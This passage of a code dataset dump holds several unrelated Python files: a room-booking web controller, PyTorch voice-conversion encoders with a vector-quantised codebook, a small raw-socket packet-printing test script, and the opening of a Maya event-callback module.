timedelta(days=flexible_days)\n flexible_end_dt = day_end_dt + timedelta(days=flexible_days)\n\n occurrences = ReservationOccurrence.find(\n Reservation.room_id.in_(room_ids),\n Reservation.id != reservation_id,\n ReservationOccurrence.start_dt >= flexible_start_dt,\n ReservationOccurrence.end_dt <= flexible_end_dt,\n ReservationOccurrence.is_valid,\n _join=ReservationOccurrence.reservation,\n _eager=ReservationOccurrence.reservation\n ).options(ReservationOccurrence.NO_RESERVATION_USER_STRATEGY).all()\n\n candidates = {}\n for days in xrange(-flexible_days, flexible_days + 1):\n offset = timedelta(days=days)\n series_start = start_dt + offset\n series_end = end_dt + offset\n if series_start < flexible_start_dt:\n continue\n candidates[series_start, series_end] = ReservationOccurrence.create_series(series_start, series_end,\n (repeat_frequency,\n repeat_interval))\n return occurrences, candidates\n\n def _create_booking(self, form, room):\n if 'submit_book' in form and 'submit_prebook' in form:\n # Admins have the choice\n prebook = form.submit_prebook.data\n else:\n # Otherwise the existence of the book submit button means the user can book\n prebook = 'submit_book' not in form\n reservation = Reservation.create_from_data(room, form.data, session.user, prebook)\n db.session.add(reservation)\n db.session.flush()\n return reservation\n\n def _get_success_url(self, booking):\n return url_for('rooms.roomBooking-bookingDetails', booking)\n\n def _create_booking_response(self, form, room):\n \"\"\"Creates the booking and returns a JSON response.\"\"\"\n try:\n booking = self._create_booking(form, room)\n except NoReportError as e:\n db.session.rollback()\n return jsonify(success=False, msg=unicode(e))\n flash(_(u'Pre-Booking created') if booking.is_pending else _(u'Booking created'), 'success')\n return jsonify(success=True, url=self._get_success_url(booking))\n\n def _validate_room_booking_limit(self, form, booking_limit_days):\n day_start_dt = datetime.combine(form.start_dt.data.date(), time())\n day_end_dt = datetime.combine(form.end_dt.data.date(), time(23, 59))\n selected_period_days = (day_end_dt - day_start_dt).days\n return selected_period_days <= booking_limit_days\n\n\nclass RHRoomBookingNewBookingSimple(RHRoomBookingNewBookingBase):\n def _process_args(self):\n self._room = Room.get(int(request.view_args['roomID']))\n if self._room is None:\n raise NotFound(u'This room does not exist')\n\n def _make_form(self):\n start_date = None\n force_today = False\n if 'start_date' in request.args:\n force_today = True\n try:\n start_date = datetime.strptime(request.args['start_date'], '%Y-%m-%d').date()\n except ValueError:\n pass\n else:\n if not self._room.check_advance_days(start_date, user=session.user, quiet=True):\n start_date = date.today()\n flash(_(u\"This room cannot be booked at the desired date, using today's date instead.\"), 'warning')\n\n self.past_date = start_date is not None and start_date < date.today()\n if start_date is None or start_date <= date.today():\n start_dt, end_dt, self.date_changed = get_default_booking_interval(\n duration=self.DEFAULT_BOOKING_DURATION,\n precision=self.DEFAULT_START_TIME_PRECISION,\n force_today=force_today\n )\n self.date_changed = self.date_changed and not self.past_date\n else:\n start_dt = datetime.combine(start_date, Location.working_time_start)\n end_dt = datetime.combine(start_date, Location.working_time_end)\n self.date_changed = False\n defaults = FormDefaults(room_id=self._room.id,\n start_dt=start_dt,\n end_dt=end_dt)\n return self._make_confirm_form(self._room, defaults=defaults, form_class=NewBookingSimpleForm)\n\n def _get_view(self, **kwargs):\n return WPRoomBookingNewBookingSimple(self, **kwargs)\n\n def _process(self):\n room = self._room\n rooms = Room.find_all()\n form = self._make_form()\n\n if form.is_submitted() and not form.validate():\n occurrences = {}\n candidates = {}\n conflicts = {}\n pre_conflicts = {}\n only_conflicts = False\n else:\n occurrences, candidates = self._get_all_occurrences([self._room.id], form)\n conflicts, pre_conflicts = self._get_all_conflicts(self._room, form)\n candidate_days = {occ.date for candidate in candidates.itervalues() for occ in candidate}\n conflicting_days = {occ.date for occ in conflicts.iterkeys()}\n only_conflicts = candidate_days <= conflicting_days\n\n if form.validate_on_submit() and not form.submit_check.data:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if not self._validate_room_booking_limit(form, booking_limit_days):\n msg = (_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days))\n return jsonify(success=False, url=url_for('rooms.room_book', room), msg=msg)\n return self._create_booking_response(form, room)\n\n can_override = room.can_be_overridden(session.user)\n return self._get_view(form=form,\n room=room,\n rooms=rooms,\n occurrences=occurrences,\n candidates=candidates,\n conflicts=conflicts,\n only_conflicts=only_conflicts,\n pre_conflicts=pre_conflicts,\n start_dt=form.start_dt.data,\n end_dt=form.end_dt.data,\n repeat_frequency=form.repeat_frequency.data,\n repeat_interval=form.repeat_interval.data,\n can_override=can_override,\n past_date=not form.is_submitted() and self.past_date,\n date_changed=not form.is_submitted() and self.date_changed).display()\n\n\nclass RHRoomBookingCloneBooking(RHRoomBookingBookingMixin, RHRoomBookingNewBookingSimple):\n def _process_args(self):\n RHRoomBookingBookingMixin._process_args(self)\n\n # use 'room' if passed through GET\n room_id = request.args.get('room', None)\n\n if room_id is None:\n # otherwise default to reservation's\n self._room = self._reservation.room\n else:\n self._room = Room.get(int(room_id))\n\n if self._room is None:\n raise NotFound(u'This room does not exist')\n\n def _get_view(self, **kwargs):\n return RHRoomBookingNewBookingSimple._get_view(self, clone_booking=self._reservation, **kwargs)\n\n def _update_datetime(self):\n \"\"\"Make necessary changes to reservation's start and end datetime.\n\n Move the start date to the current day, adjust the end date\n accordingly and if the start datetime is still in the past, change the\n start and end time to the current (rounded up) time.\n\n :return: A dict with the new start and end datetime\n \"\"\"\n reservation_duration = self._reservation.end_dt - self._reservation.start_dt\n date_delta = date.today() - self._reservation.start_dt.date()\n start_dt = self._reservation.start_dt + date_delta\n end_dt = start_dt + reservation_duration\n if start_dt < datetime.now():\n new_start_dt = round_up_to_minutes(datetime.now(), 15) + timedelta(minutes=15)\n time_delta = new_start_dt - start_dt\n start_dt = new_start_dt\n end_dt = end_dt + time_delta\n return {'start_dt': start_dt, 'end_dt': end_dt}\n\n def _make_form(self):\n self.past_date = self.date_changed = False\n changes = {'room_id': self._room.id}\n changes.update(self._update_datetime())\n\n if self._reservation.created_by_user != session.user:\n # if the user is cloning someone else's booking, set him/her as booked_for\n changes.update(booked_for_user=session.user,\n booked_for_name=session.user.full_name,\n contact_email=session.user.email,\n contact_phone=session.user.phone)\n\n defaults = FormDefaults(self._reservation,\n skip_attrs=set(changes),\n **changes)\n\n return self._make_confirm_form(self._room, defaults=defaults, form_class=NewBookingSimpleForm)\n\n\nclass RHRoomBookingNewBooking(RHRoomBookingNewBookingBase):\n def _process_args(self):\n try:\n self._step = int(request.form.get('step', 1))\n except ValueError:\n self._step = 1\n\n def _get_view(self, view, **kwargs):\n views = {'select_room': WPRoomBookingNewBookingSelectRoom,\n 'select_period': WPRoomBookingNewBookingSelectPeriod,\n 'confirm': WPRoomBookingNewBookingConfirm}\n return views[view](self, **kwargs)\n\n def _get_select_room_form_defaults(self):\n start_dt, end_dt, date_changed = get_default_booking_interval(duration=self.DEFAULT_BOOKING_DURATION,\n precision=self.DEFAULT_START_TIME_PRECISION,\n force_today=False)\n return FormDefaults(start_dt=start_dt, end_dt=end_dt), date_changed\n\n def _make_select_room_form(self):\n # Step 1\n self._rooms = sorted(Room.find_all(is_active=True), key=lambda r: natural_sort_key(r.full_name))\n form_obj, self.date_changed = self._get_select_room_form_defaults()\n form = NewBookingCriteriaForm(obj=form_obj)\n form.room_ids.choices = [(r.id, None) for r in self._rooms]\n return form\n\n def _make_select_period_form(self, defaults=None):\n # Step 2\n # If we come from a successful step 1 submission we use the default values provided by that step.\n if self._step == 1:\n return NewBookingPeriodForm(formdata=MultiDict(), obj=defaults)\n else:\n return NewBookingPeriodForm()\n\n def _show_confirm(self, room, form, step=None, defaults=None):\n # form can be PeriodForm or Confirmform depending on the step we come from\n if step == 2:\n confirm_form = self._make_confirm_form(room, step, defaults=defaults)\n else:\n # Step3 => Step3 due to an error in the form\n confirm_form = form\n\n conflicts, pre_conflicts = self._get_all_conflicts(room, form)\n repeat_msg = RepeatMapping.get_message(form.repeat_frequency.data, form.repeat_interval.data)\n return self._get_view('confirm', form=confirm_form, room=room, start_dt=form.start_dt.data,\n end_dt=form.end_dt.data, repeat_frequency=form.repeat_frequency.data,\n repeat_interval=form.repeat_interval.data, repeat_msg=repeat_msg, conflicts=conflicts,\n pre_conflicts=pre_conflicts, errors=confirm_form.error_list).display()\n\n def _process_select_room(self):\n # Step 1: Room(s), dates, repetition selection\n form = self._make_select_room_form()\n if form.validate_on_submit():\n flexible_days = form.flexible_dates_range.data\n day_start_dt = datetime.combine(form.start_dt.data.date(), time())\n day_end_dt = datetime.combine(form.end_dt.data.date(), time(23, 59))\n selected_rooms = [r for r in self._rooms if r.id in form.room_ids.data]\n selected_period_days = (day_end_dt - day_start_dt).days\n for room in selected_rooms:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if selected_period_days > booking_limit_days:\n flash(_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days), 'error')\n return redirect(url_for('rooms.book'))\n occurrences, candidates = self._get_all_occurrences(form.room_ids.data, form, flexible_days)\n period_form_defaults = FormDefaults(repeat_interval=form.repeat_interval.data,\n repeat_frequency=form.repeat_frequency.data)\n period_form = self._make_select_period_form(period_form_defaults)\n\n # Show step 2 page\n return self._get_view('select_period', rooms=selected_rooms, occurrences=occurrences, candidates=candidates,\n start_dt=day_start_dt, end_dt=day_end_dt, period_form=period_form, form=form,\n repeat_frequency=form.repeat_frequency.data,\n repeat_interval=form.repeat_interval.data, flexible_days=flexible_days).display()\n\n # GET or form errors => show step 1 page\n return self._get_view('select_room', errors=form.error_list, rooms=self._rooms, form=form,\n my_rooms=[r.id for r in Room.get_owned_by(session.user)],\n max_room_capacity=Room.max_capacity, can_override=rb_is_admin(session.user),\n date_changed=not form.is_submitted() and self.date_changed, ).display()\n\n def _process_select_period(self):\n form = self._make_select_period_form()\n if form.is_submitted():\n # Errors in here are only caused by users messing with the submitted data so it's not\n # worth making the code more complex to show the errors nicely on the originating page.\n # Doing so would be very hard anyway as we don't keep all data necessary to show step 2\n # when it's not a step 1 form submission.\n if not form.validate():\n raise fossirError(u'
'.join(form.error_list))\n room = Room.get(form.room_id.data)\n if not room:\n raise fossirError(u'Invalid room')\n # Show step 3 page\n confirm_form_defaults = FormDefaults(form.data)\n return self._show_confirm(room, form, self._step, confirm_form_defaults)\n\n def _process_confirm(self):\n # The form needs the room to create the equipment list, so we need to get it \"manually\"...\n room = Room.get(int(request.form['room_id']))\n form = self._make_confirm_form(room)\n if not room.can_be_booked(session.user) and not room.can_be_prebooked(session.user):\n raise Forbidden('You cannot book this room')\n if form.validate_on_submit():\n return self._create_booking_response(form, room)\n # There was an error in the form\n return self._show_confirm(room, form)\n\n def _process(self):\n if self._step == 1:\n return self._process_select_room()\n elif self._step == 2:\n return self._process_select_period()\n elif self._step == 3:\n return self._process_confirm()\n else:\n return redirect(url_for('rooms.book'))\n\n\nclass RHRoomBookingModifyBooking(RHRoomBookingBookingMixin, RHRoomBookingNewBookingBase):\n def _check_access(self):\n if not self._reservation.can_be_modified(session.user):\n raise Forbidden\n\n def _get_view(self, **kwargs):\n return WPRoomBookingModifyBooking(self, **kwargs)\n\n def _get_success_url(self):\n return url_for('rooms.roomBooking-bookingDetails', self._reservation)\n\n def _process(self):\n room = self._reservation.room\n form = ModifyBookingForm(obj=self._reservation,\n old_start_dt=self._reservation.start_dt, old_end_dt=self._reservation.end_dt)\n form.used_equipment.query = room.find_available_vc_equipment()\n\n if not room.notification_for_assistance and not self._reservation.needs_assistance:\n del form.needs_assistance\n\n invalid_form = form.is_submitted() and not form.validate()\n if invalid_form:\n occurrences = {}\n candidates = {}\n conflicts = {}\n pre_conflicts = {}\n else:\n occurrences, candidates = self._get_all_occurrences([room.id], form, reservation_id=self._reservation.id)\n conflicts, pre_conflicts = self._get_all_conflicts(room, form, self._reservation.id)\n\n if form.validate_on_submit() and not form.submit_check.data:\n try:\n booking_limit_days = room.booking_limit_days or rb_settings.get('booking_limit')\n if not self._validate_room_booking_limit(form, booking_limit_days):\n msg = (_(u'Bookings for the room \"{}\" may not be longer than {} days')\n .format(room.name, booking_limit_days))\n return jsonify(success=False, url=url_for('rooms.roomBooking-modifyBookingForm', self._reservation),\n msg=msg)\n self._reservation.modify(form.data, session.user)\n flash(_(u'Booking updated'), 'success')\n except NoReportError as e:\n db.session.rollback()\n return jsonify(success=False, msg=unicode(e))\n return jsonify(success=True, url=self._get_success_url())\n\n elif invalid_form and not form.submit_check.data and request.is_xhr:\n return jsonify(success=False, msg='\\n'.join(form.error_list))\n\n return self._get_view(form=form, room=room, rooms=Room.find_all(), occurrences=occurrences,\n candidates=candidates, conflicts=conflicts, pre_conflicts=pre_conflicts,\n start_dt=form.start_dt.data, end_dt=form.end_dt.data, only_conflicts=False,\n repeat_frequency=form.repeat_frequency.data, repeat_interval=form.repeat_interval.data,\n reservation=self._reservation,\n can_override=room.can_be_overridden(session.user)).display()\n\n\nclass RHRoomBookingCalendar(RHRoomBookingBase):\n MAX_DAYS = 365 * 2\n\n def _process_args(self):\n today = datetime.now().date()\n self.start_dt = get_datetime_from_request('start_', default=datetime.combine(today, time(0, 0)))\n self.end_dt = get_datetime_from_request('end_', default=datetime.combine(self.start_dt.date(), time(23, 59)))\n period = self.end_dt.date() - self.start_dt.date() + timedelta(days=1)\n self._overload = period.days > self.MAX_DAYS\n\n def _process(self):\n if self._overload:\n rooms = []\n occurrences = []\n else:\n rooms = Room.find_all(is_active=True)\n occurrences = (ReservationOccurrence\n .find(Reservation.room_id.in_(room.id for room in rooms),\n ReservationOccurrence.start_dt >= self.start_dt,\n ReservationOccurrence.end_dt <= self.end_dt,\n ReservationOccurrence.is_valid,\n _join=ReservationOccurrence.reservation,\n _eager=ReservationOccurrence.reservation)\n .options(ReservationOccurrence.NO_RESERVATION_USER_STRATEGY)\n .all())\n\n return WPRoomBookingCalendar(self, rooms=rooms, occurrences=occurrences, start_dt=self.start_dt,\n end_dt=self.end_dt, overload=self._overload, max_days=self.MAX_DAYS).display()\n","sub_path":"fossir/modules/rb/controllers/user/reservations.py","file_name":"reservations.py","file_ext":"py","file_size_in_byte":33073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620064075","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n# import tsensor\nfrom model.layers import ConvNorm\n \n# RuntimeError: Given groups=1, weight of size 128 512 1, \n# expected input[16, 406, 80] to have 512 channels, but got 406 channels instead \ndef pad_layer(inp, layer, pad_type='reflect'):\n kernel_size = layer.kernel_size[0]\n # print(\"kernel_size\", kernel_size) # 1\n if kernel_size % 2 == 0:\n pad = (kernel_size//2, kernel_size//2 - 1)\n else:\n pad = (kernel_size//2, kernel_size//2)\n # print(\"pad shape\", pad) #(0,0)\n # print(\"before padding, inp shape\", inp.size())\n # padding\n inp = F.pad(inp, \n pad=pad,\n mode=pad_type)\n # print(\"after padding, inp shape\", inp.size()) \n out = layer(inp)\n return out\n \ndef get_act(act):\n if act == 'relu':\n return nn.ReLU()\n elif act == 'lrelu':\n return nn.LeakyReLU()\n else:\n return nn.ReLU() \ndef conv_bank(x, module_list, act, pad_type='reflect'):\n outs = []\n for layer in module_list:\n out = act(pad_layer(x, layer, pad_type))\n outs.append(out)\n out = torch.cat(outs + [x], dim=1)\n return out\n\nclass VQEmbeddingEMA(nn.Module):\n '''\n reference from: https://github.com/bshall/VectorQuantizedCPC/blob/master/model.py\n '''\n def __init__(self, n_embeddings, embedding_dim, commitment_cost=0.25, decay=0.999, epsilon=1e-5):\n super(VQEmbeddingEMA, self).__init__()\n self.commitment_cost = commitment_cost\n self.decay = decay\n self.epsilon = epsilon\n\n init_bound = 1 / 512\n embedding = torch.Tensor(n_embeddings, embedding_dim)\n embedding.uniform_(-init_bound, init_bound)\n self.register_buffer(\"embedding\", embedding) # only change during forward\n self.register_buffer(\"ema_count\", torch.zeros(n_embeddings))\n self.register_buffer(\"ema_weight\", self.embedding.clone())\n\n def inference(self, x):\n M, D = self.embedding.size()\n x_flat = x.detach().reshape(-1, D)\n\n distances = torch.addmm(torch.sum(self.embedding ** 2, dim=1) +\n torch.sum(x_flat ** 2, dim=1, keepdim=True),\n x_flat, self.embedding.t(),\n alpha=-2.0, beta=1.0)\n\n indices = torch.argmin(distances.float(), dim=-1)\n quantized = F.embedding(indices, self.embedding)\n quantized = quantized.view_as(x)\n residual = x - quantized\n return quantized, residual, indices.view(x.size(0), x.size(1))\n\n def forward(self, x):\n M, D = self.embedding.size()\n x_flat = x.detach().reshape(-1, D)\n\n distances = torch.addmm(torch.sum(self.embedding ** 2, dim=1) +\n torch.sum(x_flat ** 2, dim=1, keepdim=True),\n x_flat, self.embedding.t(),\n alpha=-2.0, beta=1.0) # calculate the distance between each ele in embedding and x\n\n indices = torch.argmin(distances.float(), dim=-1)\n encodings = F.one_hot(indices, M).float()\n quantized = F.embedding(indices, self.embedding)\n quantized = quantized.view_as(x)\n\n if self.training: # EMA based codebook learning\n self.ema_count = self.decay * self.ema_count + (1 - self.decay) * torch.sum(encodings, dim=0)\n\n n = torch.sum(self.ema_count)\n self.ema_count = (self.ema_count + self.epsilon) / (n + M * self.epsilon) * n\n\n dw = torch.matmul(encodings.t(), x_flat)\n self.ema_weight = self.decay * self.ema_weight + (1 - self.decay) * dw\n\n self.embedding = self.ema_weight / self.ema_count.unsqueeze(-1)\n\n e_latent_loss = F.mse_loss(x, quantized.detach())\n loss = self.commitment_cost * e_latent_loss\n \n residual = x - quantized\n \n quantized = x + (quantized - x).detach()\n\n avg_probs = torch.mean(encodings, dim=0)\n perplexity = torch.exp(-torch.sum(avg_probs * torch.log(avg_probs + 1e-10)))\n\n return quantized, residual, loss, perplexity\n\n\n# conten encoder from https://github.com/jjery2243542/adaptive_voice_conversion \n# + vq from https://github.com/bshall/VectorQuantizedCPC/blob/master/model.py\n\nclass ContentEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(ContentEncoder, self).__init__()\n self.n_conv_blocks = model_config[\"content_encoder\"][\"n_conv_blocks\"]\n self.subsample = model_config[\"content_encoder\"][\"subsample\"]\n self.act = get_act(model_config[\"content_encoder\"][\"act\"]) #'relu'\n self.c_in = model_config[\"content_encoder\"][\"c_in\"]\n self.c_h = model_config[\"content_encoder\"][\"c_h\"]\n self.c_out= model_config[\"content_encoder\"][\"c_out\"]\n self.kernel_size= model_config[\"content_encoder\"][\"kernel_size\"]\n self.bank_size= model_config[\"content_encoder\"][\"bank_size\"]\n self.bank_scale= model_config[\"content_encoder\"][\"bank_scale\"]\n self.c_bank= model_config[\"content_encoder\"][\"c_bank\"]\n self.subsample= model_config[\"content_encoder\"][\"subsample\"]\n self.dropout_rate= model_config[\"content_encoder\"][\"dropout_rate\"]\n ####### vq layer ######\n self.n_embeddings = model_config[\"content_encoder\"][\"VQencoder\"][\"n_embeddings\"]\n self.z_dim = model_config[\"content_encoder\"][\"VQencoder\"][\"z_dim\"]\n self.c_dim = model_config[\"content_encoder\"][\"VQencoder\"][\"c_dim\"]\n\n\n self.conv_bank = nn.ModuleList(\n [nn.Conv1d(self.c_in, self.c_bank, kernel_size=k) for k in range(self.bank_scale, self.bank_size + 1, self.bank_scale)])\n in_channels = self.c_bank * (self.bank_size // self.bank_scale) + self.c_in\n self.in_conv_layer = nn.Conv1d(in_channels, self.c_h, kernel_size=1)\n self.first_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size) for _ \\\n in range(self.n_conv_blocks)])\n self.second_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size, stride=sub) \n for sub, _ in zip(self.subsample, range(self.n_conv_blocks))])\n self.norm_layer = nn.InstanceNorm1d(self.c_h, affine=False)\n self.dropout_layer = nn.Dropout(p=self.dropout_rate)\n\n self.codebook = VQEmbeddingEMA(self.n_embeddings, self.z_dim)\n self.rnn = nn.LSTM(self.z_dim, self.c_dim, batch_first=True)\n\n\n def forward(self, x):\n # with tsensor.clarify():\n # print(\"x shape\", x.size()) # ([16, 406, 80]) \n x = x.transpose(1,2)\n out = conv_bank(x, self.conv_bank, act=self.act)\n # print(\"put shape\", out.size())\n # out = conv_bank(x, self.conv_bank)\n # dimension reduction layer\n out = pad_layer(out, self.in_conv_layer)\n out = self.norm_layer(out)\n out = self.act(out)\n out = self.dropout_layer(out)\n # convolution blocks\n for l in range(self.n_conv_blocks):\n y = pad_layer(out, self.first_conv_layers[l])\n y = self.norm_layer(y)\n y = self.act(y)\n y = self.dropout_layer(y)\n y = pad_layer(y, self.second_conv_layers[l])\n y = self.norm_layer(y)\n y = self.act(y)\n y = self.dropout_layer(y)\n if self.subsample[l] > 1:\n out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n out = y + out\n # 前面的网络时间轴上下采样了, 1/2 原本输入特征是([16, 128, 406])(batch, feature, frame),输出的out是([16, 128, 51]) \n z_beforeVQ = out.transpose(1,2)\n z, r, loss, perplexity = self.codebook(z_beforeVQ) \n # print(\"out shape\",out.size()) # batch, feature, frame ([16, 128, 51])\n # print(\"z_beforeVQ shape\", z_beforeVQ.size()) # batch, frame, feature ([16, 51, 128]) \n # print(\"z_afterVQ shape\", z.size()) # ([16, 51, 128]) \n # print(\"r shape\", r.size()) # ([16, 51, 128]) \n # print(\"loss\", loss)\n # print(\"perplexity\", perplexity) \n c, _ = self.rnn(z) # (16, 51, 128) -> (64, 51, 256) \n # print(\"c shape\", c.size()) #([16, 51, 256]) \n #input.size(-1) must be equal to input_size. Expected 64, got 51 \n return z, c, z_beforeVQ, loss, perplexity\n # mu = pad_layer(out, self.mean_layer)\n # log_sigma = pad_layer(out, self.std_layer)\n # return out, mu, log_sigma\n\n # def inference(self, x):\n # print(\"x shape\", x.size())\n # x = x.transpose(1,2) \n # out = conv_bank(x, self.conv_bank, act=self.act)\n # # dimension reduction layer\n # out = pad_layer(out, self.in_conv_layer)\n # out = self.norm_layer(out)\n # out = self.act(out)\n # out = self.dropout_layer(out)\n # # convolution blocks\n # for l in range(self.n_conv_blocks):\n # y = pad_layer(out, self.first_conv_layers[l])\n # y = self.norm_layer(y)\n # y = self.act(y)\n # y = self.dropout_layer(y)\n # y = pad_layer(y, self.second_conv_layers[l])\n # y = self.norm_layer(y)\n # y = self.act(y)\n # y = self.dropout_layer(y)\n # if self.subsample[l] > 1:\n # out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n # out = y + out\n # z_beforeVQ = out.transpose(1,2)\n # z, r, indices = self.codebook.inference(z_beforeVQ) # z: (bz, 128/2, 64)\n # c, _ = self.rnn(z) # (64, 140/2, 64) -> (64, 140/2, 256)\n # return z, c, z_beforeVQ, indices\n\n\n\n\n# adin vc speaker encoder\nclass StyleEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(StyleEncoder, self).__init__()\n self.c_in = model_config[\"style_encoder\"][\"c_in\"]\n self.c_h = model_config[\"style_encoder\"][\"c_h\"]\n self.c_out= model_config[\"style_encoder\"][\"c_out\"] \n self.kernel_size= model_config[\"style_encoder\"][\"kernel_size\"] \n self.n_conv_blocks = model_config[\"style_encoder\"][\"n_conv_blocks\"] \n self.n_dense_blocks = model_config[\"style_encoder\"][\"n_dense_blocks\"] \n self.subsample= model_config[\"style_encoder\"][\"subsample\"] \n self.act = get_act(model_config[\"style_encoder\"][\"act\"]) #'relu'\n self.bank_size= model_config[\"style_encoder\"][\"bank_size\"]\n self.bank_scale= model_config[\"style_encoder\"][\"bank_scale\"]\n self.c_bank= model_config[\"style_encoder\"][\"c_bank\"]\n self.dropout_rate= model_config[\"style_encoder\"][\"dropout_rate\"] \n\n self.conv_bank = nn.ModuleList(\n [nn.Conv1d(self.c_in, self.c_bank, kernel_size=k) for k in range(self.bank_scale, self.bank_size + 1, self.bank_scale)])\n in_channels = self.c_bank * (self.bank_size // self.bank_scale) + self.c_in\n self.in_conv_layer = nn.Conv1d(in_channels, self.c_h, kernel_size=1)\n self.first_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size) for _ \\\n in range(self.n_conv_blocks)])\n self.second_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size, stride=sub) \n for sub, _ in zip(self.subsample, range(self.n_conv_blocks))])\n self.pooling_layer = nn.AdaptiveAvgPool1d(1)\n self.first_dense_layers = nn.ModuleList([nn.Linear(self.c_h, self.c_h) for _ in range(self.n_dense_blocks)])\n self.second_dense_layers = nn.ModuleList([nn.Linear(self.c_h, self.c_h) for _ in range(self.n_dense_blocks)])\n self.output_layer = nn.Linear(self.c_h, self.c_out)\n self.dropout_layer = nn.Dropout(p=self.dropout_rate)\n self.mean_layer = nn.Conv1d(self.c_h, self.c_out, kernel_size=1)\n self.std_layer = nn.Conv1d(self.c_h, self.c_out, kernel_size=1) \n\n def conv_blocks(self, inp):\n out = inp\n # convolution blocks\n for l in range(self.n_conv_blocks):\n y = pad_layer(out, self.first_conv_layers[l])\n y = self.act(y)\n y = self.dropout_layer(y)\n y = pad_layer(y, self.second_conv_layers[l])\n y = self.act(y)\n y = self.dropout_layer(y)\n if self.subsample[l] > 1:\n out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n out = y + out\n return out\n\n def dense_blocks(self, inp):\n out = inp\n # dense layers\n for l in range(self.n_dense_blocks):\n y = self.first_dense_layers[l](out)\n y = self.act(y)\n y = self.dropout_layer(y)\n y = self.second_dense_layers[l](y)\n y = self.act(y)\n y = self.dropout_layer(y)\n out = y + out\n return out\n\n def forward(self, x):\n # print(\"x shape\", x.size())\n x = x.transpose(1,2) \n out = conv_bank(x, self.conv_bank, act=self.act)\n # out = conv_bank(x, self.conv_bank)\n # dimension reduction layer\n out = pad_layer(out, self.in_conv_layer)\n out = self.act(out)\n # conv blocks\n out = self.conv_blocks(out)\n # avg pooling\n out = self.pooling_layer(out).squeeze(2)\n # print(\"after pooling layer shape\", out.shape) # ([16, 128]) \n # dense blocks\n out = self.dense_blocks(out)\n out = self.output_layer(out)\n # print(\"style encoder final style embedding shape\", out.shape) # ([16, 128]) \n out_for_mean_var = out.unsqueeze(1).transpose(1,2)\n # print(\"out_for_mean_var shape\", out_for_mean_var.size()) #([16, 128, 1]) \n mu = pad_layer(out_for_mean_var, self.mean_layer).squeeze() # ([16, 128, 1]) -> ([16, 1, 128]) \n log_sigma = pad_layer(out_for_mean_var, self.std_layer).squeeze() \n # print(\"mu shape\", mu.size()) ([16, 128]) \n # print(\"log_sigma shape\", log_sigma.size()) ([16, 128]) \n return out, mu, log_sigma \n # return out\n\n\n\nclass SpectrogramEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(SpectrogramEncoder, self).__init__()\n self.dim_neck = model_config[\"SpectrogramEncoder\"][\"dim_neck\"]\n self.c_in = model_config[\"SpectrogramEncoder\"][\"c_in\"]\n convolutions = []\n for i in range(3):\n conv_layer = nn.Sequential(\n ConvNorm(self.c_in,\n 512,\n kernel_size=5, stride=1,\n padding=2,\n dilation=1, w_init_gain='relu'),\n nn.BatchNorm1d(512))\n convolutions.append(conv_layer)\n self.convolutions = nn.ModuleList(convolutions)\n \n self.lstm = nn.LSTM(512, self.dim_neck, 2, batch_first=True, bidirectional=True)\n\n def forward(self, x):\n x = x.squeeze(1).transpose(2,1)\n # print(\"after squeeze and transpose shape\", x.size()) ([16, 512, 128]) \n # c_org = c_org.unsqueeze(-1).expand(-1, -1, x.size(-1))\n # x = torch.cat((x, c_org), dim=1)\n \n for conv in self.convolutions:\n x = F.relu(conv(x))\n x = x.transpose(1, 2)\n \n self.lstm.flatten_parameters()\n outputs, _ = self.lstm(x)\n # print(\"outputs shape\", outputs.size())\n # out_forward = outputs[:, :, :self.dim_neck]\n # out_backward = outputs[:, :, self.dim_neck:]\n # codes = []\n # for i in range(0, outputs.size(1), self.freq):\n # codes.append(torch.cat((out_forward[:,i+self.freq-1,:],out_backward[:,i,:]), dim=-1))\n return outputs\n \n\n","sub_path":"model/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":15746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314967612","text":"#!/usr/bin/python3\n\nimport socket\n\ndef main():\n s = socket.socket(\n socket.AF_PACKET,\n socket.SOCK_RAW,\n socket.htons(3)\n )\n frameCount=0\n\n s.bind(('eth0', 3))\n\n while True:\n message = s.recv(256)\n\n print(\"This is packet number :\", frameCount)\n print(message)\n\n frameCount+=1\n if frameCount > 1000:\n exit()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150232195","text":"\nimport logging\nfrom functools import partial\nimport maya.cmds as cmds\nimport maya.OpenMaya as api\nimport pymel.core as pm\nimport pymetanode as meta\n\nfrom .blueprints import Blueprint\nfrom .rigs import isRig\n\n__all__ = [\n 'Event',\n 'MayaCallbackEvents',\n 'RigEventsMixin',\n 'RigLifecycleEvents',\n]\n\nLOG = logging.getLogger(__name__)\n\n\nclass Event(list):\n \"\"\"\n A list of callable objects. Calling an Event\n will cause a call to each item in the list in order.\n \"\"\"\n\n def __call__(self, *args, **kwargs):\n for func in self:\n func(*args, **kwargs)\n\n def __repr__(self):\n return \"Event(%s)\" % list.__repr__(self)\n\n def appendUnique(self, item):\n if item not in self:\n self.append(item)\n\n def removeAll(self, item):\n while item in self:\n self.remove(item)\n\n\nclass MayaCallbackEvents(object):\n \"\"\"\n Base for any event dispatcher that will make use\n of Maya api MMessage callbacks.\n\n Provides functionality for easy callback management\n to make sure callbacks are not redundantly registered\n and are properly removed.\n 